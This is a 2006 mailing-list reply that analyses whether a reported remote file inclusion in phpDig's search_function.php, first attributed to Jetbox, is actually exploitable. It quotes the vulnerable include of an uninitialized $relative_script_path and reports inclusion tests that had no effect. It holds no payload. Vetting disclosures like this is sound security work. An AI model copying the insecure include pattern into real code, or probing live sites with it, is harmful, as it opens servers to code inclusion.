Hi Steve,
Steven M. Christey schrieb am Tue, 29 Aug 2006 19:57:13 -0400:
Frank Reissner said:
//comments
function phpdigSearch(){
Line: 423 <?php include $relative_script_path.'/libs/htmlheader.php'
?>
...
}
Please explain us how that should be exploited.
While this statement appears to be in a function declaration, there
would be nested "<?php" tags - a parse error, at least in my PHP 4.
I tested it with PHP 4.3.10 on Mac OS X with Apache
1.3.33 and the script does nothing. No parse error,
no results. Only a white page.
Local and remote file inclusion tests shows no results,
too.
So, this code is "live" within the script, somehow.
Maybe. I find it hard to read, some more tabs would
be a got think. :-)
I put a few 'echo "Test ...";'-Lines in the code, that
one after the last } is the only one wich is executed.
Bad test, I know, but a "quick$dirty" way to look, which
parts are executed and which not.
And, in fact, if we look at the surrounding context (at least for my
copy of search_function.php), we have this:
else {
$t_strings = array_merge($t_mstrings,$t_fstrings);
phpdigParseTemplate($template,$t_strings,$table_results);
}
}
else {
?>
<?php include $relative_script_path.'/libs/htmlheader.php' ?>
<head>
<title><?php print $title_message ?></title>
<?php include $relative_script_path.'/libs/htmlmetas.php' ?>
Notice the "?>" in front of the include statement, which closes off
the first bit of executable code.
I'm not sure about the defintion of function-definitions.
In a normal script it's possible to mix <?...?>-PHP-Code
and HTML-Code, for example if there are many HTML-tags which
otherwise hat to be echo'ed in PHP. Is this possible inside
a function-definition? The PHP-Manual says nothing about
this (or I did'nt found it :-) ).
So, this looks like it could be exploitable using a direct request to
search_function.php, since at the point of the include, the
$relative_script_path variable is *not* initialized.
It someway looks like this, yes.
I tried it with no results, but failing tests are no reliable
proof for non-inclusion.
But I tend to the conclusion, the whole script is really only
one function-definition.
Finally - the original pathname suggested a possible third party
module, and in fact, the affected file and referenced code matches
that of phpDig 1.8.8, so this is probably a vulnerability in phpDig
instead of Jetbox.
I take a quick look at PhpDig 1.8.8.
The search_function.php is mostly the same, here we found
a comment:
// $relative_script_path set in search.php file
Tests (remote and local inclusion) shows no effects. But as
above... no proof.
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>
